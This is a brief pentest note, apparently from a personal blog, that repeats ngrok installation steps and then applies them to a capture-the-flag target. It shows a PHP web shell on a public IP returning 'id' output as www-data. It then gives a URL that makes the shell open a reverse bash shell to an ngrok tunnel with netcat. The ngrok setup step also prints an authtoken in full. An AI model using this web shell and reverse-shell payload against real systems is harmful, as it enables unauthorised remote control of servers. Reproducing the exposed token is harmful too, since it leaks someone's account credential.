1. Unzip to install
On Linux or Mac OS X you can unzip ngrok from a terminal with the following command. On Windows, just double click ngrok.zip to extract it.
$ unzip /path/to/ngrok.zip
2. Connect your account
Running this command will add your authtoken to the default
ngrok.yml
configuration file. This will grant you access to more features and longer session times. Running tunnels will be listed on the status page of the dashboard.$ ./ngrok authtoken 1fu9GMyDHHprxjIHAHWJV9JcsWG_68xWVAvAoYd3iuGTEgATq
3. Fire it up
Read the documentation on how to use ngrok. Try it out by running it from the command line:
$ ./ngrok help
To start a HTTP tunnel forwarding to your local port 80, run this next:
$ ./ngrok http 80
Next, check out some tutorials like below
question on gym, i can E:\PENTEST>curl http://164.90.147.56:8081/upload/kamehameha.php?telepathy=id
PNG
uid=33(www-data) gid=33(www-data) groups=33(www-data)
E:\PENTEST> -> how to get a shell ( if i do not want to enable nat on my router , thus using my wan ip ), because the CTF is not accessible by VPN ( like htb etc)
download from
https://dashboard.ngrok.com/get-started/setup
.
.
next we trigger it like buff or defcon redteam village
http://164.90.147.56:8081/upload/kamehameha.php?telepathy=nc%200.tcp.ngrok.io%2015283%20-e%20/bin/bash
or download from https://github.com/puckiestyle/pentest/blob/master/ngrok-stable-windows-amd64.zip
Author : Puckiestyle